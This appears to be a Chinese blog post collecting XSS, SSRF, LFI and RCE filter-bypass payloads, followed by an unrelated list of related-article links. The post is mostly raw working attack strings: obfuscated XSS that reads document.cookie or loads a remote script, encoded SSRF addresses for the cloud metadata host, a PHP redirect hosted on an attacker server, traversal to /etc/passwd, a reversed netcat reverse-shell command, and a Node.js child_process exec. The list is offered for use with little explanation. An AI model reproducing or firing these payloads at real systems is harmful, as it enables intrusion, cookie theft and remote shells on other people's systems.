javascript:%ef%bb%bfalert(XSS)  xss%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F  xss%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd  lfi../../etc/passwd  lfi<svG/x=">"/oNloaD=confirm()//  xsshttp://⑯⑨。②⑤④。⑯⑨。②⑤④/  ssrfhttp://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/  ssrfhttp://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/  ssrfhttp://②⑧⑤②⓪③⑨①⑥⑥:80/  ssrfhttp://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/  ssrfhttp://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥  ssrfalert?.(document?.cookie)  xss<x/ onpointerRawupdatE=+\u0061\u006cert&DiacriticalGrave;1&DiacriticalGrave;>Tocuch me!  xss<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">  xss<lol/onauxclick=[0].some(alert)>rightclickhere  xss\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss  xssmarquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>  xss<svg onload='new Function`["__"].find(al\u0065rt)`'>  xss<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">  xss<svg onload=&#97&#108&#101&#114&#116(1)>  xss<svg onload='new Function`["__"].find(al\u0065rt)`'>  xss$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)  rce<svg%09%0a%0b%0c%0d%a0%00%20onload=alert (1)>  xssFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")();  xss<img src=x onerror="a='',b=!a+a,aa=!b+a,ab=a+{},ba=b[a++],bb=b[baa=a],bab=++baa+a,aaa=ab[baa+bab],b[aaa+=ab[a]+(b.aa+ab)[a]+aa[bab]+ba+bb+b[baa]+aaa+ba+ab[a]+bb][aaa](aa[a]+aa[baa]+b[bab]+bb+ba+'(a)')()"> xss<svg onload=alert("")>  xss<svg onload=alert%26%230000000040"")>  xss<svg onx=() onload=(confirm)(1)>  xss<input/%00/autofocus=""/%00/onfocus=.1|alert`XSS`><object/data=javascript:alert()>  xss<a/href="javascript%0A%0D:alert()">  -(a=alert,b="__",[b].find(a))-'  xss<img/src/onerror=arguments[0].path.pop().['al'+'ert'](1)>file:///etc/x%252Fy/../passwd?/../passwd
<svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b>
<img src="1" onerror=s=createElement('script');body.appendChild(s);s.src="https://14.rs">javas&Tab;cript:alert(1)
<xssBypass/onpointermove=(confirm)(1)>MoveMouseHere
<svg><script xlink:href="{ASCII}data:,alert(1)"></script></svg>
<img src=l onerror="a:b:c:d:alert(1)">
<a/href="javascript%0A%0D:alert()">
<svg onload=alert%26%230000000040">
<svg onx=() onload=(confirm)(1)>
%3CsVG2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
<object/data=javascript:alert()>
<svg onload=alert(")>
<lol/onauxclick-[0].some(alert)>rightclickhere
<sVG/x=">"/oNloaD=confirm()///*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>

css xss

"><style>@keyframesx{}</style><xss style="animation-name:x" onanimationend="[].map(alert('xss'))"></xss>><b/style=position:fixed;top:0;left:0;font-size:200px>CSS<

alert绕过


(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[8680439..toString(30)](1)

ssrf重定向绕过

攻击者vps上:


<?phpheader('location: http://127.0.0.1');
?>

测试:


http://target.com/image?url=http://attaker/1.php
cat /etc/passwd{\c''\a""t,/e''*?/?a?s??}{\c''\a""\t,/\e''*?/\p*\d}

nodejs开发软件或者站点下rce
<img src="1" onerror="require('child_process').exec('calc.exe',null);">

xss and ssrf bypass 小tips相关推荐

  1. 本人常用的一些编码小Tips(虽然不多,但很好用)

    本人常用的一些编码小Tips 我是可爱的目录 本人常用的一些编码小Tips 一.概述 二.Windows的一些常用的快捷键 (一).Win + others 类型 (二).Alt + others 类 ...

  2. php childnodes,小tips:HTML DOM中的children和childNodes属性

    childNodes 属性 标准的,childNodes 属性返回节点的子节点集合,以 NodeList 对象.包括HTML节点,所有属性,文本.可以通过nodeType来判断是哪种类型的节点,只有当 ...

  3. 小TIPS:合拼gridview的header

    http://www.cnblogs.com/jackyrong/archive/2006/08/15/477791.html 小TIPS:合拼gridview的header 在asp.net 2.0 ...

  4. 小tips:JS之浅拷贝与深拷贝

    浅拷贝: function extendCopy(p) {var c = {};for (var i in p) {c[i] = p[i];}return c; } 深拷贝: function dee ...

  5. 不定期备考小tips[数模][0] #20210529

    不定期备考小tips[数模][0] #20210529 边值问题 S-L微分方程中两种内积的理解 一种内积:(u,v)=∫uvdx(u,v)=\int uvdx(u,v)=∫uvdx 另一种内积:(u ...

  6. 递归算法中的小Tips

    递归算法中的小Tips 记忆化 尾递归 快速幂 递归的基本操作已经在 二叉树的笔记中介绍了.但是在做题的过程中发现,递归还是有一些小技巧的.有时候一般的递归还有可能超出时间限制 记忆化 在递归的过程中 ...

  7. excel中#N/A的解释同比环比基比画四象限图的小tips字符串截取函数substitute的深入理解

    分组分析,同比环比定基比,字符串截取等问题的总结 EXCEL中#N/A,是"不适用"的意思,多用在填写表格的时候,表示"本栏目(对我)不适用",在没有东西可填写 ...

  8. swift——一些有用的小Tips

    UITableView 有时候UI需要tableView距离上方的元素间隙为0,加上这段代码就行 self.tableView.tableHeaderView = UIView.init(frame: ...

  9. 前端必备,5大mock省时提效小tips,用了提前下班一小时

    一.一些为难前端的业务场景 在我的工作经历里,需要等待后端童鞋配合我的情形大概有以下几种: a.我们跟外部有项目合作,需要调用到第三方接口. 一般这种情况下,商务那边谈合同,走流程,等第三方审核,我们 ...

最新文章

  1. 没有读过的书,就不要瞎推荐了!
  2. 判断用户输入的日期是否为当前日期
  3. SAE取消每日免费云豆赠送机制
  4. idea包显示问题-层次显示设置-idea2020版
  5. pandas库基础学习
  6. 《javascript 高级程序设计》 笔记1 1~7章
  7. c matlab 引擎调用,【MATLAB与C的混合编程】之【C程序调用Matlab计算引擎】(1)
  8. popen和pclose
  9. mysql5.464位下载_MySQL Front 64位
  10. 计算机指令的操作码和地址,操作码和地址码
  11. 浅谈严格控制普通高等学校招生规模
  12. 【Java EE 学习第21天 使用易宝支付接口实现java网上支付功能】
  13. 【智能制造】中国工程院正式提出新一代智能制造,理论自信引领制造强国
  14. 【小米商城】--类别展示,登出,注销商品详情展示
  15. 接私活/毕业设计必备,基于SpringBoot+Activiti的Java底层框架的实现
  16. 行业典型案例解读 | FASS全闪高性能文件网关解决方案
  17. 抖音矩阵号,优化排名,抖音短视频SEO矩阵系统源码开发。
  18. 巴菲特忠告中国股民怎么样以及巴菲特出过几本书
  19. 计算机考试中英文打字题,计算机信息技术(五笔及中英文打字测试试题)
  20. UMEditor配置

热门文章

  1. WordPress仿114网站导航仿爱导航网站_简约大气网站导航源码网址导航模板源码下载
  2. 游戏程序员的学习相关资料
  3. 竞选计算机课代表演讲稿开头,竞选课代表的演讲稿模板集锦8篇
  4. sqlserver2000的三个驱动包
  5. gg-editor的使用
  6. 戴尔电脑开机时开机指示灯亮,但显示器、鼠标、键盘等外设都没启动的问题
  7. 博客/网站插入网易云插件 音乐播放器教程
  8. Solid Edge 二次开发插件 ProkitAddIn 属性管理器
  9. 基于Matlab的电磁场与波“镜像电荷法”仿真——平面导体劈的点电荷镜像
  10. 注册中心宕机能否继续通讯?